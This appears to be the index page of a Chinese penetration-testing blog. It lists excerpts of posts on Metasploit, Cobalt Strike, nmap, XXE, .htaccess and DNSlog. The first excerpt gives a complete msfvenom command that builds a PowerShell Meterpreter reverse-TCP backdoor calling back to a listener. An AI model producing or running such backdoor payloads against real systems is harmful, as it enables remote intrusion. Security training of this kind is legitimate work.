metasploit生成木马 发表于 2021-03-04 更新于 2024-11-04 分类于 安全工具 生成跨平台脚本木马我们知道了可以使用msfvenom生成木马,针对脚本语言比如python、ruby、php甚至powershell,需要选择对应的payload后使用-f raw指定使用源码生成,如下所示: 生成powershell后门,meterpreter上线 1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.131 LPORT=12345 --arch x64 --platform windows -f psh-reflection -o test.ps1 阅读全文 »
metasploit小结 发表于 2021-03-04 更新于 2024-11-04 分类于 安全工具 meterpreter shell常识 mefconsole启动时在哪个目录,下载下来的文件就在哪个目录,也可以通过lcd命令切换本地临时目录。 getuid:查看当前权限 edit命令:就是msf中的vim,edit 文件 pgrep命令:从进程中筛选,并显示pid,比如pgrep notepad 阅读全文 »
红队环境(Vulnstack4) 发表于 2021-01-04 更新于 2024-11-04 分类于 内网安全 环境下载地址红队靶场 Vlunstack 4 的打靶记录 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 阅读全文 »
nmap测试大网络空间中存活的主机 发表于 2020-12-20 更新于 2024-11-04 分类于 安全技巧 前言最近在做项目的时候由于客户Vlan划分的比较多,所以进行主机探测是一件特别消耗时间的工作,Nmap作为一款强大的探测工具怎么会没有这个功能呢? 阅读全文 »
xxe常用POC 发表于 2020-11-04 更新于 2024-11-04 分类于 漏洞复现 有回显xxe如果页面存在回显型xxe漏洞,页面会显示gg(poc) 1<gg>gg<\gg> 阅读全文 »
cobaltstrike中文乱码解决 发表于 2020-09-04 更新于 2024-11-04 分类于 cobaltstrike CobaltStrike 乱码解决Windows电脑上CS乱码了,文字都变成空心方块了。 这里总结了网上的所有方法,推荐使用方法3。 阅读全文 »
hexo 发表于 2020-09-04 更新于 2024-11-04 分类于 生活 部署hexo先安装nodejs,不然没法使用npm 12345678# 全局安装hexonpm install -g hexo-cli# 创建并初始化hexo文件夹hexo init <文件夹># 进入创建好的目录cd <文件夹> # 使用npm安装相关依赖npm install 阅读全文 »
htaccess文件的深入学习 发表于 2020-07-17 更新于 2024-11-04 分类于 漏洞原理 基本概念.htaccess允许用户在此目录及子目录中按照.htaccess配置文件中的规则来解析。 需要注意的是:.htaccess中的配置会覆盖全局配置,另外如果子目录中也有.htaccess,其优先级会高于父目录,也就是会覆盖父目录中的规则。 管理员可以通过修改apache配置文件中的AllowOverride来开启.htaccess的解析。 阅读全文 »
通过DNSLOG回显验证漏洞 发表于 2020-06-04 更新于 2024-11-04 分类于 漏洞原理 通过DNSLOG回显验证漏洞前言 实际渗透测试中,有些漏洞因为没有回显导致无法准确判断漏洞是否存在,可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上,因此为了验证一些无回显漏洞,可结合DNSlog平台进行测试,本文使用的DNSlog平台链接如下:*http://dnslog.cn/* 阅读全文 »